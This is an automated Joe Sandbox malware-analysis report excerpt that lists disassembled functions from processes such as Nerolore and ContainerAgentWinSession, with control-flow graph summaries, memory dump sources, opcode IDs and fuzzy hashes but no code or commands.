                                • Instruction Fuzzy Hash: 78310AB2D1060CEFDB01DFD1C944BDEBBB9FB54336F21461AE421A6180D7795A058F60
                                Function 0115F598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 115f598-115f5a3 67 115f5a5-115f5aa 66->67 68 115f5ac-115f5af 66->68 69 115f5b6-115f5ca VirtualAlloc 67->69 68->69 70 115f5b1 68->70 70->69
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0115F5C3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2093218096.0000000001153000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF2000, based on PE: true
                                • Associated: 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093218096.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f00000_Nerolore.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 9e82c25d21f3f749e7e3ba4b997ff1b21db2f086861549aaff8c6be790b066ec
                                • Instruction ID: 43a5a2a3226bf142765c92f685056c827d631539e7b195ceaf073cf1ea2ab63b
                                • Opcode Fuzzy Hash: 9e82c25d21f3f749e7e3ba4b997ff1b21db2f086861549aaff8c6be790b066ec
                                • Instruction Fuzzy Hash: E4E0ECB631020DABDB54CD4CD944B5A339DA788215F148011FA59D7245C234E8518B65
                                Function 010B7A80 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 243 10b7a80-10b7a8f call ff8e14 246 10b7a94-10b7a99 call 1001b84 243->246 248 10b7a9e-10b7aa1 246->248 249 10b7b27-10b7b2a 248->249 250 10b7aa7-10b7ab5 248->250 251 10b7b38-10b7b3a 249->251 252 10b7b2c-10b7b36 call 10b786c 249->252 253 10b7ab7-10b7ac2 250->253 254 10b7b25 250->254 251->246 252->251 253->254 256 10b7ac4-10b7ae6 call ff8e14 253->256 254->249 260 10b7ae8-10b7afe 256->260 261 10b7b00-10b7b0e 256->261 260->261 261->254 262 10b7b10-10b7b20 call 10b824c 261->262 262->254
                                Memory Dump Source
                                • Source File: 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                • Associated: 00000000.00000002.2093054972.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093071531.0000000000F3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093071531.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093071531.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093071531.0000000000FA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093171653.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093171653.0000000000FF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093218096.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2093218096.0000000001153000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f00000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c2e4285962e71a2c686273a8d2fc31e67e61ed058f3179392a652978085a128
                                • Instruction ID: 5cf961616b5e8d4c24714602dbf97d3f17b0346d217c855beca233d9efe10118
                                • Opcode Fuzzy Hash: 0c2e4285962e71a2c686273a8d2fc31e67e61ed058f3179392a652978085a128
                                • Instruction Fuzzy Hash: 9E114C707006409BD369EF69D4C4A967BE7ABC5300F4442B1DA548B7E9CAB09C96DB50

                                Non-executed Functions

                                Function 0494456D Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID: b=q=
                                • API String ID: 0-4069823217
                                • Opcode ID: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                • Instruction ID: a7d01a5954cc4eb9a995d72d702e6f37bbdd892d34d4df4e903ef8042447b665
                                • Opcode Fuzzy Hash: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                • Instruction Fuzzy Hash: D1312631549396AFCB328E3884A13C7BFE6AF562013E65AAFC4C48B406D72154C7DB86
                                Function 04946070 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ba02122701c81af84adf80ed184c072d2de607ea64d6366e2ee2e08d0d5e91b
                                • Instruction ID: 68a5056f6c6482e243933abcea07d634fefbef149903bedb7c9d663e7392eab4
                                • Opcode Fuzzy Hash: 9ba02122701c81af84adf80ed184c072d2de607ea64d6366e2ee2e08d0d5e91b
                                • Instruction Fuzzy Hash: C1816C76D0122A8FCB65CF64CD48A9DB7B9BF44750F154299D80EA3254EB30AE85CF81
                                Function 04946395 Relevance: .2, Instructions: 165COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca7f95ad65ac47bbe6c4bd552168e4bdf633c372cbf967ccbdfc842fe87a652b
                                • Instruction ID: 861f614393fda6ceb178b22257a288a5f391ac282d49757660ec12a5ee0927a2
                                • Opcode Fuzzy Hash: ca7f95ad65ac47bbe6c4bd552168e4bdf633c372cbf967ccbdfc842fe87a652b
                                • Instruction Fuzzy Hash: B8613D75D0522A8BCF65DF28CD88699BBB9BF44740F1042E9E81EA3254EB309E85CF51

                                Execution Graph

                                Execution Coverage:9.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 7866 7ff84928ece1 7867 7ff84928ecff QueryFullProcessImageNameA 7866->7867 7869 7ff84928eea4 7867->7869

                                Executed Functions

                                Function 00007FF848E90D48 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                • Opcode ID: a24b4b2c5da401ce185720880c47be8b3051ebcc423b0d716abb8d79895e406c
                                • Instruction ID: 74ea3d4f25b0b4e7833c2e290139e3066053070937b9065b32e9ea103a467923
                                • Opcode Fuzzy Hash: a24b4b2c5da401ce185720880c47be8b3051ebcc423b0d716abb8d79895e406c
                                • Instruction Fuzzy Hash: 9FA13171D1CA899FE789EB6888697A87FF0FF56364F4400BAC009D72D6DBB92805C711
                                Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58ce4561e856286525cdac30edb3cc0abba58a0cad46bee4643523352e68ad3c
                                • Instruction ID: ac25df5372c4e7cd2d357c2c6a8d25acfbe8c387ee696dcc5c40d64b14fb278f
                                • Opcode Fuzzy Hash: 58ce4561e856286525cdac30edb3cc0abba58a0cad46bee4643523352e68ad3c
                                • Instruction Fuzzy Hash: 2551E171A18A9D9EE788EB6C88597B87FE0FB46369F4001BEC009D33DADBB91411C754
                                Function 00007FF84928ECE1 Relevance: 1.8, APIs: 1, Instructions: 253COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2301797274.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff849280000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID: FullImageNameProcessQuery
                                • String ID:
                                • API String ID: 3578328331-0
                                • Opcode ID: 0b4eea49527c87a7f420b0d4cf1593579f905efe8c6a8e875ee725c41f6cc09c
                                • Instruction ID: 0a949789b5384242e546590808a00def65e61ef3d76f5d87bd0f649559f6321d
                                • Opcode Fuzzy Hash: 0b4eea49527c87a7f420b0d4cf1593579f905efe8c6a8e875ee725c41f6cc09c
                                • Instruction Fuzzy Hash: 2371A570518A8D8FEBA9EF18D8597F937E1FB58311F04427EE84EC7292CB7498458B81
                                Function 00007FF848E90940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: cK_H
                                • API String ID: 0-826043881
                                • Opcode ID: d6925e22eb67c511edadf0bb960cc4b93eea8eabaa3f52c23842c2f52a92d099
                                • Instruction ID: cc80882047ad7cca8a46d2609f8d1766c31ca87ebaae32cc5ffaf3ece97594c0
                                • Opcode Fuzzy Hash: d6925e22eb67c511edadf0bb960cc4b93eea8eabaa3f52c23842c2f52a92d099
                                • Instruction Fuzzy Hash: 3C510371A0CB048FE748FA5CA88667577E1FB99760F14017EE48DC32A6DE74AC4287C6
                                Function 00007FF848E90908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: b4f9bfcc1c1dbd69ca597215f88b331fe7fe4d34ce35816be2a24c0538839b68
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4821EA3170CC194FD768EA5CE889DB973D1FF9932170501BAE58EC7125E961EC8287C5
                                Function 00007FF848E90998 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 201382351f77987942a27db80f82e225ea23f38df349864c52c8f610f2e00c94
                                • Instruction ID: 992a74f185b512906157d389d59e2d8603a7da90c4679183ba7a27a128936c52
                                • Opcode Fuzzy Hash: 201382351f77987942a27db80f82e225ea23f38df349864c52c8f610f2e00c94
                                • Instruction Fuzzy Hash: B0212220B1C9595FE788B66C845A77972C2FB99365F1400BAE80EC33DBDE38AC418684
                                Function 00007FF848E9116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1fba2b437da24efd37ef0cd9078c24565b0cddf9f181ee2ef9150c7a5a3b7eaf
                                • Instruction ID: cce05e14113d5381f17d6abe8096df2517fc6466b75dea23de89392a61b7caba
                                • Opcode Fuzzy Hash: 1fba2b437da24efd37ef0cd9078c24565b0cddf9f181ee2ef9150c7a5a3b7eaf
                                • Instruction Fuzzy Hash: F431A231A0C54A8FEB45FB68C854AF97BF1FF66350F4501BAC009D7292DB79A941CB50
                                Function 00007FF848E90C25 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction ID: 00d6a7c14118ac430a6604ed35b7cdd95eb0fb2f73c0584fd6f1d0f02ca34c5c
                                • Opcode Fuzzy Hash: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction Fuzzy Hash: 05214B36A0D649AFE716B7B8D8010EC7B60FF423A4F4881B3C0088B1D3DB78254AC799
                                Function 00007FF848E908F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: cf38bec96cb45d447ad1078e5236fba8e43c672cd2e68cf8dd23c29f6f354312
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6F01FC31F0D91D0F9568E15E944A93673C2E7C6674B191279D84FC3255DEA0AC5342C4
                                Function 00007FF848E96AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcb80ac75be82548596fe27c1c22e4842d79d5a09fe0d9492bdee810de7f305f
                                • Instruction ID: d5749039f75abe3f6a94fef968240a6bb89fd36a6acf83d05db70fdd6f985a24
                                • Opcode Fuzzy Hash: bcb80ac75be82548596fe27c1c22e4842d79d5a09fe0d9492bdee810de7f305f
                                • Instruction Fuzzy Hash: 3C21FC30D0852DCFDBA9EB04C495BAAB3B1FB58355F1041BAC00EA32A4DBB5ADC0CB45
                                Function 00007FF848E966F5 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4964150383954b856b39dfe5a8a5f7d2c54ef45414215a71416b779df71fcc2
                                • Instruction ID: 16af7271c192319fac222d84e70295aab5951ca95b88a19c60cb8574779fc75f
                                • Opcode Fuzzy Hash: b4964150383954b856b39dfe5a8a5f7d2c54ef45414215a71416b779df71fcc2
                                • Instruction Fuzzy Hash: C7116131E188099FEB98FB7C9059A6863D1FF68394F4400B5D40EC72A7DE64DC468744
                                Function 00007FF848E90C38 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Function 00007FF848E90C40 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Function 00007FF848E90C48 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Function 00007FF848E90C50 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Function 00007FF848E9526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Function 00007FF848E90B95 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 9d040bbed256630ae8fd7967054e32ca68bd4389d4f1de29088fcbb7a2c8e419
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: D4D0A73161D54A8FE745B778D8498547B90FB1F314BC920E1D00CC7261D65448558701
                                Function 00007FF848E90D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Function 00007FF848E906A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Function 00007FF848E90B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 821f2b7c0af6af7d6f62a01d7a39af9af20f104bd01caa2ba1cfd0084e036ee5
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: B0C04C305158198FC954F76DC98595476A0FB0E215BD501D0E40DC7171E66ADC95C745
                                Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Function 00007FF848E935AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0e2223641c63c54a793a3730d39bf049b9d17eec812ed412aeac93c27a83171
                                • Instruction ID: 74c98ce29f0ac58c8866e7cb1458e737d09af23adde573d3f506a68a7b446102
                                • Opcode Fuzzy Hash: e0e2223641c63c54a793a3730d39bf049b9d17eec812ed412aeac93c27a83171
                                • Instruction Fuzzy Hash: A7C08C06E0DC2E9AE2552214042027E0002DF807A9F485071E00E872CACE2C190106CA
                                Function 00007FF848E906C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A

                                Executed Functions

                                Function 00007FF848E90D48 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                • Opcode ID: 3a19fa30494be71f0e032e6fe635a2f286a9d6f95bf29ccb1150054a388e2a45
                                • Instruction ID: b1fa7e5333f8fc2dcef481973781378331d76a1079dde81cdf3a017047f74ade
                                • Opcode Fuzzy Hash: 3a19fa30494be71f0e032e6fe635a2f286a9d6f95bf29ccb1150054a388e2a45
                                • Instruction Fuzzy Hash: F4912371D1CA8D8FE789EB6888697A87FE0FB56358F4400BAC009D76D2EBB91415CB41
                                Function 00007FF848EA10AF Relevance: 1.3, Instructions: 1316COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
